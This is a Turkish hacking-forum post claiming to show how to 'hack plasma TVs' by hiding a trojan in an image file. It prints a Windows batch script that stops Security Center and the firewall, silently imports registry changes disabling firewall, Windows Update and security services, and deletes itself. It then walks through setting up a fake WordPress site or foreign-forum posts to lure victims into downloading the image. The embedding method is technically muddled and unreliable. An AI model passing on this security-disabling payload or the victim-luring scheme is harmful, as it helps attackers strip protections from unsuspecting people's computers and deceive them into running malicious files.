Hoşgeldin Misafir

tv plazma hackleme

PROHACKTR41

25 May 2018
82 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
uyarı:depolaması olmayan tv lerde geçersizdir​
ve plazmaya özel degil​
TV PLAZMA HACKLEME
EVET
plazma-tamir-fiyatlari.jpg

peki nasıl hackliycez
youve-been-hacked.png

ilk önce bir resim seçeceğiniz
ve resmin içine trojan gömecegiz
Bu video dan yapabilirsiniz

Ve ya programsız da yapabilirsiniz
Pc de
İlk başta Trojanı Gömeceğimiz resimi seçiyoruzse sonra ters tıklayıp özelliklerden not defteri olarak çalıştırıyoruz resimin ilk başına ve en sonuna bu kodu ekliyoruz
@echo off
net stop "Security Center"
net stop SharedAccess
> "%Temp%.\kill.reg" ECHO A R E S
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SharedAccess]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\wuauserv]
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\w scsvc]
START /WAIT REGEDIT /S "%Temp%.\kill.reg"
DEL "%Temp%.\kill.reg"
DEL %0
Bu kodu başa ve sona ekledikten sonra alta yazmış olduğunuz kodun bir altına adınızı yazın ve kaydedin sonra tekrar windows resim ve faks gösterici ile çalıştırdıktan sonra sakın açmayın yoksa Gümlenirsiniz ve kurbana yedirip onu Gümlete bilirsiniz

ve kurban ba gönderiniz
Ve kurban kurbanlandı

Kurban nasıl bulunur
Soru-işareti.jpg

evet Gine işin içinde fake yani sahte var
Gine bir site bedava  açıyoruz
Video daki gibi
Ve ya bu yazı yi okuyup da yapabilirsiniz

1. WordPress.com’a Kayıt

1. WordPress.com’a Kayıt

Adım 1: WordPress.com’u Ziyaret
Code-your-first-WordPress-Theme-Blog2.jpg

Wordpress hesabı oluşturabilmek için ilk olarak WordPress.com adresini ziyaret edin ve mouse ile biraz aşağı inerek “Create your WordPress blog now!” butonuna tıklayın.

Alternatif olarak buraya tıklayarak direkt olarak kayıt ekranına ulaşabilirsiniz.

Adım 2: Blog Adresinizi Seçin
Bu ekranda size e-posta (e-mail address) adresiniz, kullanıcı adınız (username), parolanız (password) ve blog adresiniz (blog address) sorulacak, lütfen bu alanları geçerli şekilde doldurun.

Blog adresiniz, insanlar internete girip internet tarayıcısı ile bir siteye bağlanmak istediğinde adres satırına yazdığı kelimelerden oluşmaktadır. Örnek olarak Facebook sitesine bağlanmak için www.facebook.com adresini yazdığımız gibi sizin adresinizede bu alanda seçtiğiniz blog adresi ile bağlanılacak. Bu nedenle blog adresi seçimi esnasında mutlaka akılda kalıcı ve işiniz ile alakalı bir kelime bulmaya çalışın.

Alternatif olarak bu adımda kendi alan adınızı kullanmak istediğinize dair bir seçim yapabilirsiniz. Seçenekleriniz .me, .com, .net ve .org şeklinde. Bunu lütfen kendinizden emin olduktan sonra seçin aksi taktirde ilk bloğunuzu WordPress.com üzerinden ücretsiz olarak yaratmanızda fayda görüyorum. Zaten ilerleyen aşamalarda bu sisteme aşina olduktan sonra kendi alan adınızı kullanabileceğiniz ayarlara müdahale edebiliyor olacaksınız.

İşlemi tamamladığınızda aşağı inin ve “Create Blog” yani Blogumu Yarat linkine tıklayın.

Bu ekranda ücretli veya ücretsiz hesap seçme ekranı karşınızda olacak. Burada tercih tamamen sizi fakat benim tavsiyem ilk aşamada ücretsiz olarak sisteme aşina olmanız yönünde.

Adım 3: E-Posta Adresinizi Doğrulayın
Wordpress.com tarafından sisteme kayıt olurken vermiş olduğunuz e-posta adresine doğrulama postası gönderilecek. Blog sayfanızı aktif edebilmek için bu doğrulamayı onaylamanız gerekmekte.

Ve bu kadar  kurban site hazır
Ve wordpress ten konu açarek
resim  indirme link ki 
Filan koyun
Kurbanlar da indirdiklerinde
Ve açıklarında bum
Olacaklar
Veya yabancı forumda
Konu paylaşıp
Resim ile 
Ve yabancılarda bum olacaktır

ama plazma oldunu tv oldunu nasıl anliycaz